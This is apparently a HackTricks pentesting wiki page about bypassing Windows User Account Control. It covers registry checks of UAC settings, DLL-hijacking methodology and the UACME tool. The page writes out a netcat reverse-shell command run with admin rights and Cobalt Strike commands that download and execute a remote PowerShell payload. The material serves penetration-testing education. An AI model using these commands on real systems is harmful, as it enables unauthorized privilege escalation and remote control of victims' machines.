# UAC - User Account Control
Support HackTricks and get benefits!
* Do you work in a **cybersecurity company**? Do you want to see your **company advertised in HackTricks**? or do you want to have access to the **latest version of the PEASS or download HackTricks in PDF**? Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family)
* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
* **Join the** [**💬**](https://emojipedia.org/speech-balloon/) [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/carlospolopm)**.**
* **Share your hacking tricks by submitting PRs to the** [**hacktricks github repo**](https://github.com/carlospolop/hacktricks)**.**
Enabled
| ### UAC Bypass Theory Some programs are **autoelevated automatically** if the **user belongs** to the **administrator group**. These binaries have inside their _**Manifests**_ the _**autoElevate**_ option with value _**True**_. The binary has to be **signed by Microsoft** also. Then, to **bypass** the **UAC** (elevate from **medium** integrity level **to high**) some attackers use this kind of binaries to **execute arbitrary code** because it will be executed from a **High level integrity process**. You can **check** the _**Manifest**_ of a binary using the tool _**sigcheck.exe**_ from Sysinternals. And you can **see** the **integrity level** of the processes using _Process Explorer_ or _Process Monitor_ (of Sysinternals). ### Check UAC To confirm if UAC is enabled do: ``` REG QUERY HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\System\ /v EnableLUA HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\System EnableLUA REG_DWORD 0x1 ``` If it's **`1`** then UAC is **activated**, if its **`0`** or it **doesn't exist**, then UAC is **inactive**. Then, check **which level** is configured: ``` REG QUERY HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\System\ /v ConsentPromptBehaviorAdmin HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\System ConsentPromptBehaviorAdmin REG_DWORD 0x5 ``` * If **`0`** then, UAC won't prompt (like **disabled**) * If **`1`** the admin is **asked for username and password** to execute the binary with high rights (on Secure Desktop) * If **`2`** (**Always notify me**) UAC will always ask for confirmation to the administrator when he tries to execute something with high privileges (on Secure Desktop) * If **`3`** like `1` but not necessary on Secure Desktop * If **`4`** like `2` but not necessary on Secure Desktop * if **`5`**(**default**) it will ask the administrator to confirm to run non Windows binaries with high privileges Then, you have to take a look at the value of **`LocalAccountTokenFilterPolicy`**\ If the value is **`0`**, then, only the **RID 500** user (**built-in Administrator**) is able to perform **admin tasks without UAC**, and if its `1`, **all accounts inside "Administrators"** group can do them. And, finally take a look at the value of the key **`FilterAdministratorToken`**\ If **`0`**(default), the **built-in Administrator account can** do remote administration tasks and if **`1`** the built-in account Administrator **cannot** do remote administration tasks, unless `LocalAccountTokenFilterPolicy` is set to `1`. #### Summary * If `EnableLUA=0` or **doesn't exist**, **no UAC for anyone** * If `EnableLua=1` and **`LocalAccountTokenFilterPolicy=1` , No UAC for anyone** * If `EnableLua=1` and **`LocalAccountTokenFilterPolicy=0` and `FilterAdministratorToken=0`, No UAC for RID 500 (Built-in Administrator)** * If `EnableLua=1` and **`LocalAccountTokenFilterPolicy=0` and `FilterAdministratorToken=1`, UAC for everyone** All this information can be gathered using the **metasploit** module: `post/windows/gather/win_privs` You can also check the groups of your user and get the integrity level: ``` net user %username% whoami /groups | findstr Level ``` ## UAC bypass {% hint style="info" %} Note that if you have graphical access to the victim, UAC bypass is straight forward as you can simply click on "Yes" when the UAS prompt appears {% endhint %} The UAC bypass is needed in the following situation: **the UAC is activated, your process is running in a medium integrity context, and your user belongs to the administrators group**. It is important to mention that it is **much harder to bypass the UAC if it is in the highest security level (Always) than if it is in any of the other levels (Default).** ### UAC disabled If UAC is already disabled (`ConsentPromptBehaviorAdmin` is **`0`**) you can **execute a reverse shell with admin privileges** (high integrity level) using something like: ```bash #Put your reverse shell instead of "calc.exe" Start-Process powershell -Verb runAs "calc.exe" Start-Process powershell -Verb runAs "C:\Windows\Temp\nc.exe -e powershell 10.10.14.7 4444" ``` #### UAC bypass with token duplication * [https://ijustwannared.team/2017/11/05/uac-bypass-with-token-duplication/](https://ijustwannared.team/2017/11/05/uac-bypass-with-token-duplication/) * [https://www.tiraniddo.dev/2018/10/farewell-to-token-stealing-uac-bypass.html](https://www.tiraniddo.dev/2018/10/farewell-to-token-stealing-uac-bypass.html) ### **Very** Basic UAC "bypass" (full file system access) If you have a shell with a user that is inside the Administrators group you can **mount the C$** shared via SMB (file system) local in a new disk and you will have **access to everything inside the file system** (even Administrator home folder). {% hint style="warning" %} **Looks like this trick isn't working anymore** {% endhint %} ```bash net use Z: \\127.0.0.1\c$ cd C$ #Or you could just access it: dir \\127.0.0.1\c$\Users\Administrator\Desktop ``` ### UAC bypass with cobalt strike The Cobalt Strike techniques will only work if UAC is not set at it's max security level ```bash # UAC bypass via token duplication elevate uac-token-duplication [listener_name] # UAC bypass via service elevate svc-exe [listener_name] # Bypass UAC with Token Duplication runasadmin uac-token-duplication powershell.exe -nop -w hidden -c "IEX ((new-object net.webclient).downloadstring('http://10.10.5.120:80/b'))" # Bypass UAC with CMSTPLUA COM interface runasadmin uac-cmstplua powershell.exe -nop -w hidden -c "IEX ((new-object net.webclient).downloadstring('http://10.10.5.120:80/b'))" ``` **Empire** and **Metasploit** also have several modules to **bypass** the **UAC**. ### UAC bypass exploits [**UACME** ](https://github.com/hfiref0x/UACME)which is a **compilation** of several UAC bypass exploits. Note that you will need to **compile UACME using visual studio or msbuild**. The compilation will create several executables (like `Source\Akagi\outout\x64\Debug\Akagi.exe`) , you will need to know **which one you need.**\ You should **be careful** because some bypasses will **prompt some other programs** that will **alert** the **user** that something is happening. UACME has the **build version from which each technique started working**. You can search for a technique affecting your versions: ``` PS C:\> [environment]::OSVersion.Version Major Minor Build Revision ----- ----- ----- -------- 10 0 14393 0 ``` Also, using [this](https://en.wikipedia.org/wiki/Windows\_10\_version\_history) page you get the Windows release `1607` from the build versions. #### More UAC bypass **All** the techniques used here to bypass AUC **require** a **full interactive shell** with the victim (a common nc.exe shell is not enough). You can get using a **meterpreter** session. Migrate to a **process** that has the **Session** value equals to **1**: ![](<../../.gitbook/assets/image (96).png>) (_explorer.exe_ should works) ### Your own bypass - Basic UAC bypass methodology If you take a look to **UACME** you will note that **most UAC bypasses abuse a Dll Hijacking vulnerabilit**y (mainly writing the malicious dll on _C:\Windows\System32_). [Read this to learn how to find a Dll Hijacking vulnerability](../windows-local-privilege-escalation/dll-hijacking.md). 1. Find a binary that will **autoelevate** (check that when it is executed it runs in a high integrity level). 2. With procmon find "**NAME NOT FOUND**" events that can be vulnerable to **DLL Hijacking**. 3. You probably will need to **write** the DLL inside some **protected paths** (like C:\Windows\System32) were you don't have writing permissions. You can bypass this using: 1. **wusa.exe**: Windows 7,8 and 8.1. It allows to extract the content of a CAB file inside protected paths (because this tool is executed from a high integrity level). 2. **IFileOperation**: Windows 10. 4. Prepare a **script** to copy your DLL inside the protected path and execute the vulnerable and autoelevated binary. ### Another UAC bypass technique Consists on watching if an **autoElevated binary** tries to **read** from the **registry** the **name/path** of a **binary** or **command** to be **executed** (this is more interesting if the binary searches this information inside the **HKCU**). ![](<../../.gitbook/assets/image (9) (1) (2).png>) Use [**Trickest**](https://trickest.com/?utm\_campaign=hacktrics\&utm\_medium=banner\&utm\_source=hacktricks) to easily build and **automate workflows** powered by the world's **most advanced** community tools.\ Get Access Today: {% embed url="https://trickest.com/?utm_campaign=hacktrics&utm_medium=banner&utm_source=hacktricks" %}